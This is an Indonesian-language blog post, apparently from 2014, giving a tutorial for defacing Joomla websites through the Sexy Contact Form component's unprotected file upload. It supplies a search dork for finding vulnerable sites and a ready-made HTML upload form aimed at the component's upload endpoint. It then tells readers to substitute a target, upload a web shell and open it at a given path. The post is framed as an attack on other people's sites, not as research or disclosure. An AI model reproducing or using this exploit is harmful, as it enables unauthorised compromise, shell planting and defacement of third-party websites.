Kamis, 30 Oktober 2014

Assallamualaikum ^_^

Lama Gak  ketemu :3 , maklum lagi sibuk di dunia nyata , tapi alhamdullilah sekarang lagi libur kerja :D
ok , langsung saja , saya akan share tutorial deface Joomla dengan Com_sexycontactform

ok pertama : 

dork : inurl:/com_sexycontactform/ ( dork bisa dikembangkan :v )
exploiter : <form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form> ( simpan dengan format .html  ) * http://localhost , ganti dengan target yang sudah kalian dapat 




kemudian buka file html kalian di browser 

selanjutnya , upload shell kalian

nah , kalau sudah , nanti akan ada tulisan yang berbahasa planet :v , itu tandanya upload shell berhasil :D
akses shell : http://www.situs-target.com/component/com_sexycontactform/fileupload/files/shell.php







bagaimana ? mudah bukan :D
ok sekian dari saya ^_^




 


EmoticonEmoticon